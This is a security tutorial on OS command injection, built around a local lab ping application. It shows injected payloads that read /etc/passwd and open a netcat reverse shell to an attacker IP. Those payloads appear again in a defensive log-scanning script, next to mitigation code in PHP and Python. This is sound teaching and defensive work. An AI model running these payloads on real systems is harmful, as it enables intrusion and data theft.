OS Command Injection

Abhishek Acharya
CryptoGen Nepal
7 min read · Dec 28, 2021


OS command injection (also called shell injection) is a security vulnerability that lets an attacker execute arbitrary commands through a vulnerable endpoint. The injected command runs on the operating system (OS) of the host that serves the targeted application.

If a command injection point is found on a targeted endpoint, injecting a malicious payload is easy: the commands used in this attack are straightforward and are the same ones commonly used when interacting with an OS.

A command injection vulnerability can also be leveraged to chain multiple attack vectors. It enables an attacker to read and write sensitive files on the affected system without authentication or authorization, obtaining information such as source code, usernames, passwords, financial statements and other critical data, which can then be misused. It also allows an attacker to run malicious code on the affected endpoint to gain persistent, unauthorized access via a reverse shell. In many real-world cases, command injection has been used to compromise hosting infrastructure and abuse trust relationships to attack other systems within the network of the vulnerable endpoint.

How does OS Command Injection occur?

An OS command injection vulnerability is the result of improper input validation: user input is not sanitized before it is used. In a command injection attack, the payload is supplied as input to a vulnerable field of the targeted endpoint. Because the input is not sanitized, the payload is executed as a system command. The attacker can then execute any payload they like, since the endpoint now behaves like a command-line interface and returns output specific to the provided input.

OS command injection is a critical vulnerability. It can let threat actors gain complete control of the vulnerable server or machine, compromising its data and running services and ultimately undermining the CIA triad of information security: confidentiality, integrity and availability.

Useful Commands

OS commands are the input supplied to the vulnerable fields when exploiting OS command injection. Some of the most common commands used to obtain system information on Linux and Windows platforms are:

Show Current User

  • Linux: whoami
  • Windows: whoami

Operating System Version

  • Linux: uname -a
  • Windows: ver

Network Configuration

  • Linux: ifconfig
  • Windows: ipconfig /all

Network Connections

  • Linux: netstat -an
  • Windows: netstat -an

Running Processes

  • Linux: ps -ef
  • Windows: tasklist

Vulnerable Functions to OS Command Injection

How a web application functions is the main concern for a developer during the development phase. If security is neglected, numerous vulnerabilities arise in the application, and these vulnerabilities enable threat actors to exploit and damage the vulnerable endpoint. Functions that perform system calls are the prime targets for threat actors, as they execute OS commands according to the injected payload.

Some of the functions (PHP's, in this case) that are vulnerable to OS command injection are:

  • exec()
  • system()
  • shell_exec()
  • passthru()
  • eval()

Demonstration of OS Command Injection

A local web application was deployed to mimic an OS command injection vulnerability. The application checks whether a user-supplied endpoint is online: it accepts a domain name as input and lists the ping output.

Test Dashboard

For testing purposes, google.com is provided as input.

google.com as input

The web application runs a ping and returns the output, which looks like what one sees when checking a connection from a Linux command-line interface.

Ping Output

Exploitation

As the obtained result resembled command-line output, an OS command payload was injected: along with the domain name, the pwd command was entered into the search field. pwd prints the current working directory. The web application returned the ping information along with the current directory, which confirms that the web application is vulnerable to OS command injection.

Command: google.com; pwd

google.com input with pwd command
Ping Result with Current Working Directory

The OS command injection vulnerability lets an attacker execute any command with the privileges of the user the web application runs as. In this example, the attacker was able to read the contents of the /etc/passwd file.

Command: google.com; cat ../../../../../../../etc/passwd

Navigating to the /etc/passwd file
File content of /etc/passwd

Getting Reverse Shell

Command injection can be used to gain reverse shell access to the vulnerable machine, which allows an attacker to execute arbitrary commands remotely.

To get a reverse shell, we need the attacker's IP address and a listening port.

The attacker machine must listen on the specified port to receive the reverse shell from the vulnerable system.

The IP address of the attacker machine is 192.168.163.132.

IP address of attacker machine

Netcat (nc) was used on the attacker machine to listen for the connection from the compromised machine.

Command: nc -lvp 1234

  • -l enables listening mode;
  • -v enables verbose output;
  • -p sets the local port number, in this case 1234.

netcat listening on port 1234 in the attacker’s machine

With the attacker machine listening on port 1234, the payload was then entered into the field vulnerable to command injection to obtain the reverse shell.

Command: google.com; nc 192.168.163.132 1234 -e /bin/sh

/bin/sh is the executable of the system shell. In this scenario, the system shell of the vulnerable device is handed to the attacker machine via the reverse shell.

Reverse Shell Payload on Vulnerable Web Application

Once the reverse shell payload executed, reverse shell access was obtained on the attacker machine. The commands whoami and pwd were executed and produced the same output as the earlier code execution, and the content of /etc/passwd was read via the reverse shell.

Reverse Shell Access on The Attacker Machine
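From the defender's side, each of the payloads above leaves a trace in the web server's access log. The following is an added example, not code from the original post: a small detector that reads access-log lines, URL-decodes the host parameter that the article's ping form sends, tokenises it the way a POSIX shell would and reports every request whose value would run more than one command. The log lines, the parameter name and the /ping.php path are constructed for this example.

```python
import re
import shlex
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (combined log format), not taken from the
# original post: one benign ping request followed by three injection attempts.
SAMPLE_LOG = """\
10.0.0.5 - - [28/Dec/2021:10:01:02 +0545] "GET /ping.php?host=google.com HTTP/1.1" 200 512
10.0.0.5 - - [28/Dec/2021:10:01:40 +0545] "GET /ping.php?host=google.com%3B%20pwd HTTP/1.1" 200 540
10.0.0.5 - - [28/Dec/2021:10:02:15 +0545] "GET /ping.php?host=google.com%3B%20cat%20../../../../../../../etc/passwd HTTP/1.1" 200 2048
10.0.0.5 - - [28/Dec/2021:10:03:01 +0545] "GET /ping.php?host=google.com%3B%20nc%20192.168.163.132%201234%20-e%20/bin/sh HTTP/1.1" 200 0
"""

# Shell operators that start a new command; shlex emits them as separate tokens.
SEPARATORS = {";", "&", "&&", "|", "||"}

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d+)'
)


def shell_tokens(value):
    """Tokenise a string the way a POSIX shell would, keeping operators as tokens."""
    lexer = shlex.shlex(value, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    return list(lexer)


def split_commands(tokens):
    """Group tokens into the separate commands the shell would execute."""
    commands, current = [], []
    for tok in tokens:
        if tok in SEPARATORS:
            if current:
                commands.append(current)
            current = []
        else:
            current.append(tok)
    if current:
        commands.append(current)
    return commands


def scan_log(text, param="host"):
    """Return one finding per request whose query parameter would run extra commands."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        query = parse_qs(urlsplit(m.group("url")).query)  # parse_qs URL-decodes values
        for raw in query.get(param, []):
            try:
                commands = split_commands(shell_tokens(raw))
            except ValueError:
                # Unbalanced quotes: the shell would reject this too, but it is not a hostname
                commands = [[raw], ["<unbalanced quoting>"]]
            if len(commands) > 1:
                findings.append({
                    "ip": m.group("ip"),
                    "time": m.group("ts"),
                    "value": raw,
                    "injected": [" ".join(cmd) for cmd in commands[1:]],
                })
    return findings


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding["time"], finding["ip"], "->", finding["injected"])
```

Tokenising rather than grepping for ";" keeps the rule readable and lets the same code recognise &&, || and | chains; an allowlist check on the decoded value (a hostname pattern) is the complementary server-side control.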

Code Analysis

Examining the code shows that the PHP program uses the shell_exec() function, which executes a command via the shell and returns its complete output as a string. The user input is not filtered: it is passed straight into shell_exec(). This lack of input handling lets threat actors execute OS commands through the search field, and careful manipulation of those commands lets an attacker obtain unauthorized access to the vulnerable endpoint and its data.

Vulnerable PHP Shell Command

Mitigation

To mitigate the OS command injection vulnerability, the escapeshellcmd() function was used. escapeshellcmd() is a built-in PHP function that escapes any characters in a string that could be used to trick a shell into executing arbitrary commands. It is intended to be used before functions such as shell_exec(), system() or exec().

escapeshellcmd() escapes the characters &#;`|*?~<>^()[]{}$\ as well as \x0A (newline) and \xFF; the quote characters ' and " are escaped only when they are not paired. Because of this, the function is well suited to minimizing arbitrary command injection: most of the special characters an injection needs are escaped.

Mitigated PHP Shell Command
Vulnerable Payload to List Files
No Result After Editing the Vulnerable PHP Script
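To make the code analysis and the mitigation concrete, here is an added Python example, not the article's PHP code, that puts three approaches side by side: raw concatenation as the vulnerable handler does it, a port of the POSIX escaping rules of escapeshellcmd(), and an allowlist that passes the host to the program as a separate argument. The function names, the hostname pattern and the ping -c 4 command line are assumptions made for this example.

```python
import re

# Characters that PHP's escapeshellcmd() prefixes with a backslash on POSIX systems.
ESCAPED_CHARS = set('&#;`|*?~<>^()[]{}$\\\x0a\xff')


def escape_shell_cmd(cmd):
    """Port of the POSIX behaviour of PHP escapeshellcmd() (written for this example,
    not PHP's own code): backslash-escape shell metacharacters; a single or double
    quote is escaped only when it has no matching partner later in the string."""
    out = []
    closing = None  # index of the quote that closes the currently open pair, if any
    for i, ch in enumerate(cmd):
        if ch in ESCAPED_CHARS:
            out.append("\\")
        elif ch in "'\"":
            if closing is None:
                closing = cmd.find(ch, i + 1)
                if closing == -1:          # unpaired quote: escape it
                    closing = None
                    out.append("\\")
            elif closing == i:             # the partner of an earlier quote: leave as is
                closing = None
            else:                          # a different quote inside an open pair
                out.append("\\")
        out.append(ch)
    return "".join(out)


def vulnerable_command(host):
    """Mirrors the article's PHP handler: the input is concatenated into the shell string."""
    return "ping -c 4 " + host


def escaped_command(host):
    """The article's mitigation: escape the input before it reaches the shell."""
    return "ping -c 4 " + escape_shell_cmd(host)


# Allowlist (assumed for this example): a DNS hostname made of dot-separated labels
# of letters, digits and hyphens, nothing else. A leading '-' or any shell
# metacharacter fails the match.
HOSTNAME_RE = re.compile(
    r"(?=.{1,253}$)[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*"
)


def is_allowed_host(host):
    return HOSTNAME_RE.fullmatch(host) is not None


def safe_ping_argv(host):
    """Hypothetical safe handler: validate against the allowlist and return an argv
    list. The host is one argument, so no shell parses it and nothing can be appended."""
    if not is_allowed_host(host):
        raise ValueError(f"rejected host: {host!r}")
    return ["ping", "-c", "4", host]


if __name__ == "__main__":
    payload = "google.com; pwd"
    print(vulnerable_command(payload))
    print(escaped_command(payload))
    print(safe_ping_argv("google.com"))
```

Escaping neutralises the separators the article's payloads rely on, but escapeshellcmd() leaves whitespace untouched, so additional arguments to the same command can still be appended; validating the value against what it is supposed to be and passing it as a discrete argument closes that gap as well.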

Command Injection Property

Command injection was demonstrated above from a web application perspective, but it is not limited to web applications. Any program that runs OS commands can be vulnerable to command injection: desktop applications, web applications and command-line interface (CLI) tools alike.
In this example, command injection is executed via Python. The os module executes OS commands from program code.
The os.system() function takes the OS command as a parameter, passed as a string (a double-quoted string in the example).

Executing OS Commands From Python

Multiple commands can be executed by separating them with a semicolon (;).
In this example, three commands were separated with semicolons: ls, whoami and pwd.

Command: ls;whoami;pwd

Multiple OS Command Execution
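The chaining with ; works because os.system() hands the whole string to /bin/sh, which re-parses it; the program itself never sees three commands. The added example below (not part of the original post) shows the safe alternative in Python: passing the user-supplied value as its own argv element with subprocess, so the child process receives the entire string, separators included, as one literal argument, and shlex.join() for the case where a shell string really is unavoidable. The child program used to echo its arguments and the fixed ls command are constructed for this example.

```python
import json
import shlex
import subprocess
import sys

# Child program (constructed for this example): print the argv it received as JSON,
# so we can observe exactly what reached the process without involving a shell.
ECHO_ARGV = "import json, sys; print(json.dumps(sys.argv[1:]))"


def shell_style(user_input):
    """What os.system('ls ' + user_input) would hand to /bin/sh: a single string that
    the shell re-parses, so a ';' inside user_input starts a new command.
    Only built here, never executed."""
    return "ls " + user_input


def quoted_shell_style(user_input):
    """If a shell string cannot be avoided, shlex.join() quotes each argument so the
    input stays one word for the shell (the Python counterpart of PHP escapeshellarg())."""
    return shlex.join(["ls", user_input])


def run_without_shell(user_input):
    """Pass the input as its own argv element. No shell is involved, so the child sees
    the whole string as one argument and ';' has no special meaning."""
    result = subprocess.run(
        [sys.executable, "-c", ECHO_ARGV, user_input],
        capture_output=True,
        text=True,
        check=True,
    )
    return json.loads(result.stdout)


if __name__ == "__main__":
    payload = "ls;whoami;pwd"
    print("shell string    :", shell_style(payload))
    print("quoted string   :", quoted_shell_style(payload))
    print("argv seen by kid:", run_without_shell(payload))
```

Running the block prints the unquoted string a shell would split into three commands, the quoted string it would treat as one argument, and the single-element argument list the child process actually received.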

Conclusion

OS command injection is a critical vulnerability which, if exploited, can lead to complete system compromise. This demonstration walks step by step through what a threat actor does once OS command injection is detected. A mitigation strategy is included so that the vulnerability can be patched easily. The practical demonstration of each component gives first-hand experience that can be reproduced to learn about the presented vulnerability.
